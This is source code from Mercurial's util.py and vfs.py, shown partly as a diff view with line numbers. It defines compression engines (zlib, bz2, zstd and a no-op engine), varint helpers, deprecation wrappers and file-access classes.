    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
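
# Typical lookups against the global manager (illustrative; the engines
# involved are registered further down in this file):
#
#   compengines['zlib']                 # by engine name
#   compengines.forbundlename('gzip')   # by bundle spec name
#   compengines.forbundletype('GZ')     # by internal bundle identifier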

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
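
# A hedged sketch (kept as a comment; not part of the original module) of the
# minimal surface a third-party, bundle-only engine might implement. The
# 'snappy' name, the 'SN' identifier, and the snappy module are hypothetical:
#
#   class _snappyengine(compressionengine):
#       def name(self):
#           return 'snappy'
#
#       def bundletype(self):
#           """Hypothetical snappy compression for bundles."""
#           return 'snappy', 'SN'
#
#       def compressstream(self, it, opts=None):
#           import snappy  # hypothetical third-party dependency
#           yield snappy.compress(''.join(it))
#
#       def decompressorreader(self, fh):
#           import snappy
#           return chunkbuffer(iter([snappy.decompress(fh.read())]))
#
#   compengines.register(_snappyengine())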

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3420
3418
3421 class _bz2engine(compressionengine):
3419 class _bz2engine(compressionengine):
3422 def name(self):
3420 def name(self):
3423 return 'bz2'
3421 return 'bz2'
3424
3422
3425 def bundletype(self):
3423 def bundletype(self):
3426 """An algorithm that produces smaller bundles than ``gzip``.
3424 """An algorithm that produces smaller bundles than ``gzip``.
3427
3425
3428 All Mercurial clients should support this format.
3426 All Mercurial clients should support this format.
3429
3427
3430 This engine will likely produce smaller bundles than ``gzip`` but
3428 This engine will likely produce smaller bundles than ``gzip`` but
3431 will be significantly slower, both during compression and
3429 will be significantly slower, both during compression and
3432 decompression.
3430 decompression.
3433
3431
3434 If available, the ``zstd`` engine can yield similar or better
3432 If available, the ``zstd`` engine can yield similar or better
3435 compression at much higher speeds.
3433 compression at much higher speeds.
3436 """
3434 """
3437 return 'bzip2', 'BZ'
3435 return 'bzip2', 'BZ'
3438
3436
3439 # We declare a protocol name but don't advertise by default because
3437 # We declare a protocol name but don't advertise by default because
3440 # it is slow.
3438 # it is slow.
3441 def wireprotosupport(self):
3439 def wireprotosupport(self):
3442 return compewireprotosupport('bzip2', 0, 0)
3440 return compewireprotosupport('bzip2', 0, 0)
3443
3441
3444 def compressstream(self, it, opts=None):
3442 def compressstream(self, it, opts=None):
3445 opts = opts or {}
3443 opts = opts or {}
3446 z = bz2.BZ2Compressor(opts.get('level', 9))
3444 z = bz2.BZ2Compressor(opts.get('level', 9))
3447 for chunk in it:
3445 for chunk in it:
3448 data = z.compress(chunk)
3446 data = z.compress(chunk)
3449 if data:
3447 if data:
3450 yield data
3448 yield data
3451
3449
3452 yield z.flush()
3450 yield z.flush()
3453
3451
3454 def decompressorreader(self, fh):
3452 def decompressorreader(self, fh):
3455 def gen():
3453 def gen():
3456 d = bz2.BZ2Decompressor()
3454 d = bz2.BZ2Decompressor()
3457 for chunk in filechunkiter(fh):
3455 for chunk in filechunkiter(fh):
3458 yield d.decompress(chunk)
3456 yield d.decompress(chunk)
3459
3457
3460 return chunkbuffer(gen())
3458 return chunkbuffer(gen())
3461
3459
3462 compengines.register(_bz2engine())
3460 compengines.register(_bz2engine())
3463
3461
3464 class _truncatedbz2engine(compressionengine):
3462 class _truncatedbz2engine(compressionengine):
3465 def name(self):
3463 def name(self):
3466 return 'bz2truncated'
3464 return 'bz2truncated'
3467
3465
3468 def bundletype(self):
3466 def bundletype(self):
3469 return None, '_truncatedBZ'
3467 return None, '_truncatedBZ'
3470
3468
3471 # We don't implement compressstream because it is hackily handled elsewhere.
3469 # We don't implement compressstream because it is hackily handled elsewhere.
3472
3470
3473 def decompressorreader(self, fh):
3471 def decompressorreader(self, fh):
3474 def gen():
3472 def gen():
3475 # The input stream doesn't have the 'BZ' header. So add it back.
3473 # The input stream doesn't have the 'BZ' header. So add it back.
3476 d = bz2.BZ2Decompressor()
3474 d = bz2.BZ2Decompressor()
3477 d.decompress('BZ')
3475 d.decompress('BZ')
3478 for chunk in filechunkiter(fh):
3476 for chunk in filechunkiter(fh):
3479 yield d.decompress(chunk)
3477 yield d.decompress(chunk)
3480
3478
3481 return chunkbuffer(gen())
3479 return chunkbuffer(gen())
3482
3480
3483 compengines.register(_truncatedbz2engine())
3481 compengines.register(_truncatedbz2engine())
3484
3482
3485 class _noopengine(compressionengine):
3483 class _noopengine(compressionengine):
3486 def name(self):
3484 def name(self):
3487 return 'none'
3485 return 'none'
3488
3486
3489 def bundletype(self):
3487 def bundletype(self):
3490 """No compression is performed.
3488 """No compression is performed.
3491
3489
3492 Use this compression engine to explicitly disable compression.
3490 Use this compression engine to explicitly disable compression.
3493 """
3491 """
3494 return 'none', 'UN'
3492 return 'none', 'UN'
3495
3493
3496 # Clients always support uncompressed payloads. Servers don't because
3494 # Clients always support uncompressed payloads. Servers don't because
3497 # unless you are on a fast network, uncompressed payloads can easily
3495 # unless you are on a fast network, uncompressed payloads can easily
3498 # saturate your network pipe.
3496 # saturate your network pipe.
3499 def wireprotosupport(self):
3497 def wireprotosupport(self):
3500 return compewireprotosupport('none', 0, 10)
3498 return compewireprotosupport('none', 0, 10)
3501
3499
3502 # We don't implement revlogheader because it is handled specially
3500 # We don't implement revlogheader because it is handled specially
3503 # in the revlog class.
3501 # in the revlog class.
3504
3502
3505 def compressstream(self, it, opts=None):
3503 def compressstream(self, it, opts=None):
3506 return it
3504 return it
3507
3505
3508 def decompressorreader(self, fh):
3506 def decompressorreader(self, fh):
3509 return fh
3507 return fh
3510
3508
3511 class nooprevlogcompressor(object):
3509 class nooprevlogcompressor(object):
3512 def compress(self, data):
3510 def compress(self, data):
3513 return None
3511 return None
3514
3512
3515 def revlogcompressor(self, opts=None):
3513 def revlogcompressor(self, opts=None):
3516 return self.nooprevlogcompressor()
3514 return self.nooprevlogcompressor()
3517
3515
3518 compengines.register(_noopengine())
3516 compengines.register(_noopengine())
3519
3517
3520 class _zstdengine(compressionengine):
3518 class _zstdengine(compressionengine):
3521 def name(self):
3519 def name(self):
3522 return 'zstd'
3520 return 'zstd'
3523
3521
3524 @propertycache
3522 @propertycache
3525 def _module(self):
3523 def _module(self):
3526 # Not all installs have the zstd module available. So defer importing
3524 # Not all installs have the zstd module available. So defer importing
3527 # until first access.
3525 # until first access.
3528 try:
3526 try:
3529 from . import zstd
3527 from . import zstd
3530 # Force delayed import.
3528 # Force delayed import.
3531 zstd.__version__
3529 zstd.__version__
3532 return zstd
3530 return zstd
3533 except ImportError:
3531 except ImportError:
3534 return None
3532 return None
3535
3533
3536 def available(self):
3534 def available(self):
3537 return bool(self._module)
3535 return bool(self._module)
3538
3536
3539 def bundletype(self):
3537 def bundletype(self):
3540 """A modern compression algorithm that is fast and highly flexible.
3538 """A modern compression algorithm that is fast and highly flexible.
3541
3539
3542 Only supported by Mercurial 4.1 and newer clients.
3540 Only supported by Mercurial 4.1 and newer clients.
3543
3541
3544 With the default settings, zstd compression is both faster and yields
3542 With the default settings, zstd compression is both faster and yields
3545 better compression than ``gzip``. It also frequently yields better
3543 better compression than ``gzip``. It also frequently yields better
3546 compression than ``bzip2`` while operating at much higher speeds.
3544 compression than ``bzip2`` while operating at much higher speeds.
3547
3545
3548 If this engine is available and backwards compatibility is not a
3546 If this engine is available and backwards compatibility is not a
3549 concern, it is likely the best available engine.
3547 concern, it is likely the best available engine.
3550 """
3548 """
3551 return 'zstd', 'ZS'
3549 return 'zstd', 'ZS'
3552
3550
3553 def wireprotosupport(self):
3551 def wireprotosupport(self):
3554 return compewireprotosupport('zstd', 50, 50)
3552 return compewireprotosupport('zstd', 50, 50)
3555
3553
3556 def revlogheader(self):
3554 def revlogheader(self):
3557 return '\x28'
3555 return '\x28'
3558
3556
3559 def compressstream(self, it, opts=None):
3557 def compressstream(self, it, opts=None):
3560 opts = opts or {}
3558 opts = opts or {}
3561 # zstd level 3 is almost always significantly faster than zlib
3559 # zstd level 3 is almost always significantly faster than zlib
3562 # while providing no worse compression. It strikes a good balance
3560 # while providing no worse compression. It strikes a good balance
3563 # between speed and compression.
3561 # between speed and compression.
3564 level = opts.get('level', 3)
3562 level = opts.get('level', 3)
3565
3563
3566 zstd = self._module
3564 zstd = self._module
3567 z = zstd.ZstdCompressor(level=level).compressobj()
3565 z = zstd.ZstdCompressor(level=level).compressobj()
3568 for chunk in it:
3566 for chunk in it:
3569 data = z.compress(chunk)
3567 data = z.compress(chunk)
3570 if data:
3568 if data:
3571 yield data
3569 yield data
3572
3570
3573 yield z.flush()
3571 yield z.flush()
3574
3572
3575 def decompressorreader(self, fh):
3573 def decompressorreader(self, fh):
3576 zstd = self._module
3574 zstd = self._module
3577 dctx = zstd.ZstdDecompressor()
3575 dctx = zstd.ZstdDecompressor()
3578 return chunkbuffer(dctx.read_from(fh))
3576 return chunkbuffer(dctx.read_from(fh))
3579
3577
3580 class zstdrevlogcompressor(object):
3578 class zstdrevlogcompressor(object):
3581 def __init__(self, zstd, level=3):
3579 def __init__(self, zstd, level=3):
3582 # TODO consider omitting frame magic to save 4 bytes.
3580 # TODO consider omitting frame magic to save 4 bytes.
3583 # This writes content sizes into the frame header. That is
3581 # This writes content sizes into the frame header. That is
3584 # extra storage. But it allows a correct size memory allocation
3582 # extra storage. But it allows a correct size memory allocation
3585 # to hold the result.
3583 # to hold the result.
3586 self._cctx = zstd.ZstdCompressor(level=level)
3584 self._cctx = zstd.ZstdCompressor(level=level)
3587 self._dctx = zstd.ZstdDecompressor()
3585 self._dctx = zstd.ZstdDecompressor()
3588 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3586 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3589 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3587 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3590
3588
3591 def compress(self, data):
3589 def compress(self, data):
3592 insize = len(data)
3590 insize = len(data)
3593 # Caller handles empty input case.
3591 # Caller handles empty input case.
3594 assert insize > 0
3592 assert insize > 0
3595
3593
3596 if insize < 50:
3594 if insize < 50:
3597 return None
3595 return None
3598
3596
3599 elif insize <= 1000000:
3597 elif insize <= 1000000:
3600 compressed = self._cctx.compress(data)
3598 compressed = self._cctx.compress(data)
3601 if len(compressed) < insize:
3599 if len(compressed) < insize:
3602 return compressed
3600 return compressed
3603 return None
3601 return None
3604 else:
3602 else:
3605 z = self._cctx.compressobj()
3603 z = self._cctx.compressobj()
3606 chunks = []
3604 chunks = []
3607 pos = 0
3605 pos = 0
3608 while pos < insize:
3606 while pos < insize:
3609 pos2 = pos + self._compinsize
3607 pos2 = pos + self._compinsize
3610 chunk = z.compress(data[pos:pos2])
3608 chunk = z.compress(data[pos:pos2])
3611 if chunk:
3609 if chunk:
3612 chunks.append(chunk)
3610 chunks.append(chunk)
3613 pos = pos2
3611 pos = pos2
3614 chunks.append(z.flush())
3612 chunks.append(z.flush())
3615
3613
3616 if sum(map(len, chunks)) < insize:
3614 if sum(map(len, chunks)) < insize:
3617 return ''.join(chunks)
3615 return ''.join(chunks)
3618 return None
3616 return None
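
        # A rough sketch of the size tiers above (illustrative, inferred from
        # the code): inputs under 50 bytes are never compressed (frame
        # overhead would dominate), inputs up to ~1 MB are compressed in one
        # shot, and larger inputs are streamed in
        # COMPRESSION_RECOMMENDED_INPUT_SIZE windows to bound memory use. In
        # every tier, returning None means "store uncompressed":
        #
        #     c = zstdrevlogcompressor(zstd)   # given a loaded zstd module
        #     c.compress(b'x' * 10)       # None: below the 50 byte floor
        #     c.compress(b'x' * 100000)   # one-shot frame (kept if smaller)
        #     c.compress(b'x' * 5000000)  # chunked, streaming compression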

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
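
# For example (names here are hypothetical): if the context already contains
# 'foo~resolve', safename('foo', 'resolve', ctx) skips the bare form and
# returns 'foo~resolve~1' instead.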

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
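
# Worked example for the uvarintencode(1337) doctest above: 1337 is
# 0b10100111001. The low 7 bits (0111001 = 0x39) are emitted first with the
# continuation bit set (0x39 | 0x80 = 0xb9); the remaining bits (1337 >> 7 =
# 10 = 0x0a) fit in a single byte and are emitted without the continuation
# bit, giving '\xb9\x0a', i.e. '\xb9\n'.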

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
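
# Worked example for the uvarintdecodestream(BytesIO(b'\x80\x80\x04')) doctest
# above: 0x80 contributes 0 at shift 0, the second 0x80 contributes 0 at
# shift 7, and 0x04 (continuation bit clear) contributes 4 << 14 = 65536,
# which is returned.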

###
# Deprecation warnings for util.py splitting
###

def _deprecatedfunc(func, version, modname=None):
    def wrapped(*args, **kwargs):
        fn = pycompat.sysbytes(func.__name__)
        mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
        msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
        nouideprecwarn(msg, version, stacklevel=2)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped
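
# For example (illustrative): calling the makedate alias defined below
# forwards to dateutil.makedate() after emitting a deprecation warning of
# the form "'util.makedate' is deprecated, use 'utils.dateutil.makedate'"
# (the replacement module path is derived from func.__module__ above).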

defaultdateformats = dateutil.defaultdateformats
extendeddateformats = dateutil.extendeddateformats
makedate = _deprecatedfunc(dateutil.makedate, '4.6')
datestr = _deprecatedfunc(dateutil.datestr, '4.6')
shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')

stderr = procutil.stderr
stdin = procutil.stdin
stdout = procutil.stdout
explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
                              modname='utils.procutil')
findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
                             modname='utils.procutil')
popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
                               modname='utils.procutil')
readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
                                   modname='utils.procutil')
shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
                             modname='utils.procutil')
shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
                             modname='utils.procutil')
spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
                                modname='utils.procutil')
sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
try:
    setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
                                  modname='utils.procutil')
except AttributeError:
    pass
try:
    unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
                                    modname='utils.procutil')
except AttributeError:
    pass
closefds = procutil.closefds
isatty = _deprecatedfunc(procutil.isatty, '4.6')
popen2 = _deprecatedfunc(procutil.popen2, '4.6')
popen3 = _deprecatedfunc(procutil.popen3, '4.6')
popen4 = _deprecatedfunc(procutil.popen4, '4.6')
pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
filter = _deprecatedfunc(procutil.filter, '4.6')
mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
system = _deprecatedfunc(procutil.system, '4.6')
gui = _deprecatedfunc(procutil.gui, '4.6')
hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
rundetached = _deprecatedfunc(procutil.rundetached, '4.6')

binary = _deprecatedfunc(stringutil.binary, '4.6')
stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
email = _deprecatedfunc(stringutil.email, '4.6')
ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
wrap = _deprecatedfunc(stringutil.wrap, '4.6')
parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
@@ -1,653 +1,653 b''
# vfs.py - Mercurial 'vfs' classes
#
# Copyright Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import

import contextlib
import errno
import os
import shutil
import stat
import tempfile
import threading

from .i18n import _
from . import (
    encoding,
    error,
    pathutil,
    pycompat,
    util,
)

def _avoidambig(path, oldstat):
    """Avoid file stat ambiguity forcibly

    This function causes ``path`` to be copied if it is owned by
    another user (see issue5418 and issue5584 for detail).
    """
    def checkandavoid():
        newstat = util.filestat.frompath(path)
        # return whether file stat ambiguity is (already) avoided
        return (not newstat.isambig(oldstat) or
                newstat.avoidambig(path, oldstat))
    if not checkandavoid():
        # simply copy to change owner of path to get privilege to
        # advance mtime (see issue5418)
        util.rename(util.mktempcopy(path), path)
        checkandavoid()

class abstractvfs(object):
    """Abstract base class; cannot be instantiated"""

    def __init__(self, *args, **kwargs):
        '''Prevent instantiation; don't call this from subclasses.'''
        raise NotImplementedError('attempted instantiating ' + str(type(self)))

    def tryread(self, path):
        '''gracefully return an empty string for missing files'''
        try:
            return self.read(path)
        except IOError as inst:
            if inst.errno != errno.ENOENT:
                raise
        return ""

    def tryreadlines(self, path, mode='rb'):
        '''gracefully return an empty array for missing files'''
        try:
            return self.readlines(path, mode=mode)
        except IOError as inst:
            if inst.errno != errno.ENOENT:
                raise
        return []

    @util.propertycache
    def open(self):
        '''Open ``path`` file, which is relative to vfs root.

        Newly created directories are marked as "not to be indexed by
        the content indexing service", if ``notindexed`` is specified
        for "write" mode access.
        '''
        return self.__call__

    def read(self, path):
        with self(path, 'rb') as fp:
            return fp.read()

    def readlines(self, path, mode='rb'):
        with self(path, mode=mode) as fp:
            return fp.readlines()

    def write(self, path, data, backgroundclose=False, **kwargs):
        with self(path, 'wb', backgroundclose=backgroundclose, **kwargs) as fp:
            return fp.write(data)

    def writelines(self, path, data, mode='wb', notindexed=False):
        with self(path, mode=mode, notindexed=notindexed) as fp:
            return fp.writelines(data)

    def append(self, path, data):
        with self(path, 'ab') as fp:
            return fp.write(data)
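
    # An illustrative round trip through the helpers above, assuming a
    # concrete subclass such as the vfs class below:
    #
    #     myvfs = vfs('/path/to/.hg')     # hypothetical root
    #     myvfs.write('foo', b'data')     # writes /path/to/.hg/foo
    #     myvfs.read('foo')               # -> b'data'
    #     myvfs.append('foo', b'more')    # reopens in 'ab' mode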

    def basename(self, path):
        """return base element of a path (as os.path.basename would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.basename(path)

    def chmod(self, path, mode):
        return os.chmod(self.join(path), mode)

    def dirname(self, path):
        """return dirname element of a path (as os.path.dirname would do)

        This exists to allow handling of strange encoding if needed."""
        return os.path.dirname(path)

    def exists(self, path=None):
        return os.path.exists(self.join(path))

    def fstat(self, fp):
        return util.fstat(fp)

    def isdir(self, path=None):
        return os.path.isdir(self.join(path))

    def isfile(self, path=None):
        return os.path.isfile(self.join(path))

    def islink(self, path=None):
        return os.path.islink(self.join(path))

    def isfileorlink(self, path=None):
        '''return whether path is a regular file or a symlink

        Unlike isfile, this doesn't follow symlinks.'''
        try:
            st = self.lstat(path)
        except OSError:
            return False
        mode = st.st_mode
        return stat.S_ISREG(mode) or stat.S_ISLNK(mode)

    def reljoin(self, *paths):
        """join various elements of a path together (as os.path.join would do)

